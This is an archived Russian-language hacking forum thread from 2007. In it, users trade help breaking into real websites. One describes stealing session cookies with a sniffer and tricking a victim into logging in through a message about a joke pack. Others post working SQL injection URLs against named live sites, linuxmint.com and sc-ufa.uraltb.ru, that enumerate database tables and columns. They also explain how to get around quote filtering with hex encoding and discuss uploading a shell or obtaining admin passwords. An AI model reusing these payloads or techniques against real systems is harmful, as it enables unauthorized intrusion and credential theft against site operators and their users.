 |
|
08.11.2007, 19:13
|
|
Новичок
Регистрация: 23.10.2007
Сообщений: 28
С нами:
9763159
Репутация:
19
|
|
а Как
Вот в куках есть
Member_id:это я нашол
Pass_hash:а суда чито ставить?*
|
|
|
08.11.2007, 19:27
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами:
9762146
Репутация:
1174
|
|
А как сам думаешь? Вот ты нашел в данных с сниффера Pass_hash ??? Ответ напрашивается...человек в данный момент не авторизован на форуме.
Подскажите с инъектом,я ток начал пробовать..
Код:
http://www.linuxmint.com/mirrors.php?id=-1+union+select+1,2,TABLE_NAME,4,5,6+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='admin'+LIMIT+1,1+--+
Я так понял, что фильтруется кавычка, как можно это сделать иначе ?
Последний раз редактировалось ZAMUT; 08.11.2007 в 19:33..
|
|
|
|
08.11.2007, 19:31
|
|
Новичок
Регистрация: 23.10.2007
Сообщений: 28
С нами:
9763159
Репутация:
19
|
|
Авторизирован.
Я ему отослал на форуме лс:
Привет.Зайди,скачай пак анекдотов.
Он зашел и все....
ОН АВТОРИЗИРОВАН.
|
|
|
|
08.11.2007, 20:04
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
С нами:
10246130
Репутация:
141
|
|
zamut,
Where+table_name=название в хексе
Where+table_name=название в чаре
|
|
|
|
08.11.2007, 20:07
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами:
9762146
Репутация:
1174
|
|
2delay(0)
спс, сейчас попробую..
|
|
|
|
08.11.2007, 20:11
|
|
Новичок
Регистрация: 27.09.2007
Сообщений: 11
С нами:
9800721
Репутация:
4
|
|
извиняюсь, версию недоглядел..автор, наверно, допустил опечатку
http://www.linuxmint.com/mirrors.php?id=-1+union+select+1,2,COLUMN_NAME,4,5,6+FROM+INFORMAT I ON_SCHEMA.COLUMNS+WHERE+COLUMN_NAME='admin'+LIMIT+ 1 ,1+--+
Последний раз редактировалось VentRu; 08.11.2007 в 21:12..
|
|
|
|
10.11.2007, 04:16
|
|
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
С нами:
10126406
Репутация:
206
|
|
http://sc-ufa.uraltb.ru/?id=4+UNION+SELECT+1,2,3+LIMIT+1,1/*
можно ли сюда шелл залить или пароль получить от админки? или от БД
|
|
|
|
10.11.2007, 04:33
|
|
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
С нами:
10488959
Репутация:
474
|
|
Шелл не зальешь. Файл прив выключен, есть экранирование кавычек.
Прав на чтение mysql.user нет
Версия мускула 5, можно узнать имена таблиц и столбцов
Код:
http://sc-ufa.uraltb.ru/?id=4+and+1=0+UNION+SELECT+1,table_name,3+from+INFORMATION_SCHEMA.tables+limit+16,1/*
вот например таблица _a3access
Код:
http://sc-ufa.uraltb.ru/?id=4+and+1=0+UNION+SELECT+1,table_name,3+from+INFORMATION_SCHEMA.tables+limit+16,1/*
Для просмотра меняшь limit.
вот пример просмотра столбцов в этой же таблице
Код:
http://sc-ufa.uraltb.ru/?id=4+and+1=0+UNION+SELECT+1,column_name,3+from+INFORMATION_SCHEMA.columns+where+table_name=0x5F6133616363657373+limit+0,1/*
Для просмотра других столбцов также меняешь лимит |
|
|
|
10.11.2007, 05:42
|
|
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
С нами:
10126406
Репутация:
206
|
|
ещё вопрос, как изменять данные которые находяться в столбцах
|
|
|
|
10.11.2007, 12:08
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от SVAROG
ещё вопрос, как изменять данные которые находяться в столбцах
При помощи MySql инъекции в конструкции select никак, потому что нет возможности использовать разделитель ";"
__________________
Карфаген должен быть разрушен...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
